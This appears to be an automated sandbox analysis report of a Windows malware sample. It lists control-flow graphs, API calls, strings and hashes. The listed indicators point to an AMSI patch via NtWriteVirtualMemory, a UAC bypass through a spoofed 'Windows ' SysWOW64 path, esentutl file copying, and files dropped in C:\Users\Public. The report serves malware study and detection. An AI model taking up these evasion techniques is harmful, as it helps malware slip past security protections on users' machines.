2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 * 16 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2aa7c10 call 2aa8338 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 ExitProcess 8220->8400 8399->8400 8414 2ab953f-2ab9812 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aaf094 call 2a94860 call 2a949a0 call 2a946d4 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a97e5c 8399->8414 8834 2ab9818-2ab9aea call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aae358 call 2a94530 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94de0 * 2 call 2a94764 call 2aadc8c 8414->8834 8835 2ab9aef-2ab9cf0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a949f8 call 2aa8d70 8414->8835 8589 2ab887b-2ab887e 8427->8589 8590 2ab8880-2ab8ba0 call 2a949f8 call 2aade50 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aad164 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 8427->8590 8428->8427 8589->8590 9124 2ab8bb9-2ab939c call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 ResumeThread call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 CloseHandle call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aa8080 call 2aa894c * 6 CloseHandle call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 8590->9124 9125 2ab8ba2-2ab8bb4 call 2aa8730 8590->9125 8807->8808 8834->8835 8835->8400 8874->8875 9124->8220 9125->9124
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 02AA89D0: FreeLibrary.KERNEL32(75370000,00000000,00000000,00000000,00000000,02B1738C,Function_0000662C,00000004,02B1739C,02B1738C,05F5E103,00000040,02B173A0,75370000,00000000,00000000), ref: 02AA8AAA
                                                                                                                                            • Part of subcall function 02AADC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02AADD5E), ref: 02AADCCB
                                                                                                                                            • Part of subcall function 02AADC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02AADD05
                                                                                                                                            • Part of subcall function 02AADC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02AADD32
                                                                                                                                            • Part of subcall function 02AADC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02AADD3B
                                                                                                                                          • Sleep.KERNEL32(000003E8,ScanBuffer,02B17380,02ABB7B8,UacScan,02B17380,02ABB7B8,ScanString,02B17380,02ABB7B8,02ABBB30,00000000,00000000,02ABBB24,00000000,00000000), ref: 02AB40CB
                                                                                                                                            • Part of subcall function 02AA88B8: LoadLibraryW.KERNEL32(amsi), ref: 02AA88C1
                                                                                                                                            • Part of subcall function 02AA88B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02AA8920
                                                                                                                                          • Sleep.KERNEL32(000003E8,ScanBuffer,02B17380,02ABB7B8,OpenSession,02B17380,02ABB7B8,UacScan,02B17380,02ABB7B8,000003E8,ScanBuffer,02B17380,02ABB7B8,UacScan,02B17380), ref: 02AB4277
                                                                                                                                            • Part of subcall function 02AA894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02B173A8,02AAA587,ScanString,02B173A8,02AAA93C,ScanBuffer,02B173A8,02AAA93C,Initialize,02B173A8,02AAA93C,UacScan), ref: 02AA8960
                                                                                                                                            • Part of subcall function 02AA894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02AA897A
                                                                                                                                            • Part of subcall function 02AA894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02B173A8,02AAA587,ScanString,02B173A8,02AAA93C,ScanBuffer,02B173A8,02AAA93C,Initialize), ref: 02AA89B6
                                                                                                                                          • Sleep.KERNEL32(00004E20,UacScan,02B17380,02ABB7B8,ScanString,02B17380,02ABB7B8,ScanBuffer,02B17380,02ABB7B8,OpenSession,02B17380,02ABB7B8,UacInitialize,02B17380,02ABB7B8), ref: 02AB50EE
                                                                                                                                            • Part of subcall function 02AADC04: RtlI.N(?,?,00000000,02AADC7E), ref: 02AADC2C
                                                                                                                                            • Part of subcall function 02AADC04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02AADC7E), ref: 02AADC42
                                                                                                                                            • Part of subcall function 02AADC04: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02AADC7E), ref: 02AADC61
                                                                                                                                            • Part of subcall function 02A97E5C: GetFileAttributesA.KERNEL32(00000000,?,02AB041F,ScanString,02B17380,02ABB7B8,OpenSession,02B17380,02ABB7B8,ScanString,02B17380,02ABB7B8,UacScan,02B17380,02ABB7B8,UacInitialize), ref: 02A97E67
                                                                                                                                            • Part of subcall function 02AA85BC: WinExec.KERNEL32(?,?), ref: 02AA8624
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Library$FilePath$FreeSleep$LoadNameName_$AddressAttributesCloseCreateDeleteExecProcWrite
                                                                                                                                          • String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
                                                                                                                                          • API String ID: 2171786310-3926298568
                                                                                                                                          • Opcode ID: f8dafe48739b20289de976d04700f98ebd85f766bc7b9fa16b234cb6315b6d0d
                                                                                                                                          • Instruction ID: 2e2a36cba21eeda616de393a87da4bcbaa311a35d16b3517f07708dfbe67a81f
                                                                                                                                          • Opcode Fuzzy Hash: f8dafe48739b20289de976d04700f98ebd85f766bc7b9fa16b234cb6315b6d0d
                                                                                                                                          • Instruction Fuzzy Hash: FC432875A8015CDFDF21EB65DE90ACA73FABF89304F5044E29408AB614DE70AE92CF51
                                                                                                                                          Function 02AAAFE0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 10194 2aaafe0-2aaafec 10195 2aab0c8-2aab0d2 IsBadReadPtr 10194->10195 10196 2aab0e4-2aab0ea 10195->10196 10197 2aab0d4-2aab0d8 10195->10197 10197->10196 10198 2aab0da-2aab0de 10197->10198 10198->10196 10199 2aaaff1-2aab007 IsBadReadPtr 10198->10199 10200 2aab00d-2aab044 GetModuleHandleW call 2aa8274 10199->10200 10201 2aab0c5 10199->10201 10205 2aab0a8-2aab0b2 IsBadReadPtr 10200->10205 10206 2aab046-2aab04b 10200->10206 10201->10195 10205->10201 10207 2aab0b4-2aab0be IsBadReadPtr 10205->10207 10206->10205 10207->10201 10208 2aab0c0-2aab0c3 10207->10208 10208->10201 10209 2aab04d-2aab05f call 2aa84c8 10208->10209 10212 2aab0a2-2aab0a5 10209->10212 10213 2aab061-2aab065 10209->10213 10212->10205 10214 2aab07c-2aab08e call 2aa8274 10213->10214 10215 2aab067-2aab07a call 2aa8274 10213->10215 10220 2aab090-2aab09d call 2aa84c8 10214->10220 10215->10220 10220->10212
                                                                                                                                          APIs
                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 02AAB000
                                                                                                                                          • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02AAB017
                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 02AAB0AB
                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000002), ref: 02AAB0B7
                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 02AAB0CB
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Read$HandleModule
                                                                                                                                          • String ID: KernelBase$LoadLibraryExA
                                                                                                                                          • API String ID: 2226866862-113032527
                                                                                                                                          • Opcode ID: f088a69d652fa92251bb5cd1c2d57d4da6915cb0e8f229db212de6f71c58e641
                                                                                                                                          • Instruction ID: 45b6c059ab5ad91c4a697db2aa77f8af1e8a9bb9fd28a1382d0f0693cacfd0f5
                                                                                                                                          • Opcode Fuzzy Hash: f088a69d652fa92251bb5cd1c2d57d4da6915cb0e8f229db212de6f71c58e641
                                                                                                                                          • Instruction Fuzzy Hash: 593162B1640305BBDB20DB69CD96F5AB7A8BF15758F004914EB24EB281DB34A954CB60
                                                                                                                                          Function 02A91724 Relevance: 9.0, APIs: 7, Instructions: 289sleepCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 12102 2a91724-2a91736 12103 2a91968-2a9196d 12102->12103 12104 2a9173c-2a9174c 12102->12104 12107 2a91a80-2a91a83 12103->12107 12108 2a91973-2a91984 12103->12108 12105 2a9174e-2a9175b 12104->12105 12106 2a917a4-2a917ad 12104->12106 12109 2a9175d-2a9176a 12105->12109 12110 2a91774-2a91780 12105->12110 12106->12105 12113 2a917af-2a917bb 12106->12113 12114 2a91a89-2a91a8b 12107->12114 12115 2a91684-2a916ad VirtualAlloc 12107->12115 12111 2a91938-2a91945 12108->12111 12112 2a91986-2a919a2 12108->12112 12116 2a9176c-2a91770 12109->12116 12117 2a91794-2a917a1 12109->12117 12119 2a917f0-2a917f9 12110->12119 12120 2a91782-2a91790 12110->12120 12111->12112 12118 2a91947-2a9195b Sleep 12111->12118 12121 2a919b0-2a919bf 12112->12121 12122 2a919a4-2a919ac 12112->12122 12113->12105 12125 2a917bd-2a917c9 12113->12125 12123 2a916df-2a916e5 12115->12123 12124 2a916af-2a916dc call 2a91644 12115->12124 12118->12112 12128 2a9195d-2a91964 Sleep 12118->12128 12126 2a917fb-2a91808 12119->12126 12127 2a9182c-2a91836 12119->12127 12131 2a919d8-2a919e0 12121->12131 12132 2a919c1-2a919d5 12121->12132 12129 2a91a0c-2a91a22 12122->12129 12124->12123 12125->12105 12133 2a917cb-2a917de Sleep 12125->12133 12126->12127 12136 2a9180a-2a9181e Sleep 12126->12136 12137 2a918a8-2a918b4 12127->12137 12138 2a91838-2a91863 12127->12138 12128->12111 12139 2a91a3b-2a91a47 12129->12139 12140 2a91a24-2a91a32 12129->12140 12134 2a919fc-2a919fe call 2a915cc 12131->12134 12135 2a919e2-2a919fa 12131->12135 12132->12129 12133->12105 12142 2a917e4-2a917eb Sleep 12133->12142 12143 2a91a03-2a91a0b 12134->12143 12135->12143 12136->12127 12145 2a91820-2a91827 Sleep 12136->12145 12151 2a918dc-2a918eb call 2a915cc 12137->12151 12152 2a918b6-2a918c8 12137->12152 12146 2a9187c-2a9188a 12138->12146 12147 2a91865-2a91873 12138->12147 12149 2a91a49-2a91a5c 12139->12149 12150 2a91a68 12139->12150 12140->12139 12148 2a91a34 12140->12148 12142->12106 12145->12126 12155 2a918f8 12146->12155 12156 2a9188c-2a918a6 call 2a91500 12146->12156 12147->12146 12154 2a91875 12147->12154 12148->12139 12157 2a91a6d-2a91a7f 12149->12157 12158 2a91a5e-2a91a63 call 2a91500 12149->12158 12150->12157 12161 2a918fd-2a91936 12151->12161 12165 2a918ed-2a918f7 12151->12165 12159 2a918ca 12152->12159 12160 2a918cc-2a918da 12152->12160 12154->12146 12155->12161 12156->12161 12158->12157 12159->12160 12160->12161
                                                                                                                                          APIs
                                                                                                                                          • Sleep.KERNEL32(00000000,?,02A91FC1), ref: 02A917D0
                                                                                                                                          • Sleep.KERNEL32(0000000A,00000000,?,02A91FC1), ref: 02A917E6
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Sleep
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3472027048-0
                                                                                                                                          • Opcode ID: 1b9d341a3c09437c5988d8864b6555a4f63dd94175dc675cf54b7378890343d8
                                                                                                                                          • Instruction ID: 47caba1ccca30fdcadf36160a5427a149e138249a959e52b7c92d7cb7dd45e9f
                                                                                                                                          • Opcode Fuzzy Hash: 1b9d341a3c09437c5988d8864b6555a4f63dd94175dc675cf54b7378890343d8
                                                                                                                                          • Instruction Fuzzy Hash: 02B13472A002528FCF16CF2AD8C4355BBF1EF86395F5986AED45D8B385CB709452CB90
                                                                                                                                          Function 02AA88B8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35libraryCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          APIs
                                                                                                                                          • LoadLibraryW.KERNEL32(amsi), ref: 02AA88C1
                                                                                                                                            • Part of subcall function 02AA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02AA82FC,?,?,00000000,00000000,?,02AA8215,00000000,KernelBASE,00000000,00000000,02AA823C), ref: 02AA82C1
                                                                                                                                            • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02AA82C7
                                                                                                                                            • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(?,?), ref: 02AA82D9
                                                                                                                                            • Part of subcall function 02AA7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02AA7DEC
                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02AA8920
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                                                                                          • String ID: DllGetClassObject$W$amsi
                                                                                                                                          • API String ID: 941070894-2671292670
                                                                                                                                          • Opcode ID: 8bf0501b7d5b415c407b22ce9b45a1cfc3bf9f350c272d60334910355615032b
                                                                                                                                          • Instruction ID: 8e76865082aa0fd2dacfc53d0faea36b8198ebc9a2b23e9927dd0c5cc6580cce
                                                                                                                                          • Opcode Fuzzy Hash: 8bf0501b7d5b415c407b22ce9b45a1cfc3bf9f350c272d60334910355615032b
                                                                                                                                          • Instruction Fuzzy Hash: 84F0816158C381B9D300E3748C55F4FBACD5F62664F008A18B1A89B2D2DA79D1048B67
                                                                                                                                          Function 02A91A8C Relevance: 7.7, APIs: 6, Instructions: 175sleepCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 12190 2a91a8c-2a91a9b 12191 2a91b6c-2a91b6f 12190->12191 12192 2a91aa1-2a91aa5 12190->12192 12193 2a91c5c-2a91c60 12191->12193 12194 2a91b75-2a91b7f 12191->12194 12195 2a91b08-2a91b11 12192->12195 12196 2a91aa7-2a91aae 12192->12196 12199 2a916e8-2a9170b call 2a91644 VirtualFree 12193->12199 12200 2a91c66-2a91c6b 12193->12200 12202 2a91b3c-2a91b49 12194->12202 12203 2a91b81-2a91b8d 12194->12203 12195->12196 12201 2a91b13-2a91b27 Sleep 12195->12201 12197 2a91adc-2a91ade 12196->12197 12198 2a91ab0-2a91abb 12196->12198 12208 2a91ae0-2a91af1 12197->12208 12209 2a91af3 12197->12209 12206 2a91abd-2a91ac2 12198->12206 12207 2a91ac4-2a91ad9 12198->12207 12221 2a9170d-2a91714 12199->12221 12222 2a91716 12199->12222 12201->12196 12210 2a91b2d-2a91b38 Sleep 12201->12210 12202->12203 12211 2a91b4b-2a91b5f Sleep 12202->12211 12204 2a91b8f-2a91b92 12203->12204 12205 2a91bc4-2a91bd2 12203->12205 12213 2a91b96-2a91b9a 12204->12213 12205->12213 12215 2a91bd4-2a91bd9 call 2a914c0 12205->12215 12208->12209 12214 2a91af6-2a91b03 12208->12214 12209->12214 12210->12195 12211->12203 12216 2a91b61-2a91b68 Sleep 12211->12216 12218 2a91bdc-2a91be9 12213->12218 12219 2a91b9c-2a91ba2 12213->12219 12214->12194 12215->12213 12216->12202 12218->12219 12226 2a91beb-2a91bf2 call 2a914c0 12218->12226 12223 2a91bf4-2a91bfe 12219->12223 12224 2a91ba4-2a91bc2 call 2a91500 12219->12224 12227 2a91719-2a91723 12221->12227 12222->12227 12230 2a91c2c-2a91c59 call 2a91560 12223->12230 12231 2a91c00-2a91c28 VirtualFree 12223->12231 12226->12219
                                                                                                                                          APIs
                                                                                                                                          • Sleep.KERNEL32(00000000,?,?,00000000,02A91FE4), ref: 02A91B17
                                                                                                                                          • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02A91FE4), ref: 02A91B31
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Sleep
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3472027048-0
                                                                                                                                          • Opcode ID: 702f29bf3ad2515a89b1b86cacfee5d36fbc77f754bb1bd2ad7b3b4015076e18
                                                                                                                                          • Instruction ID: 0a04c6c2fb9253e36cfc779adb8a8ae2f18a7291c7fa03b011ade6311475bdfd
                                                                                                                                          • Opcode Fuzzy Hash: 702f29bf3ad2515a89b1b86cacfee5d36fbc77f754bb1bd2ad7b3b4015076e18
                                                                                                                                          • Instruction Fuzzy Hash: F451E0716412428FDF16CF6ACAC4766BBE1EF46314F5885AED54CCB282EB70C845CB91
                                                                                                                                          Function 02AAE4B6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112networkCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          APIs
                                                                                                                                          • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02AAE5F6
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
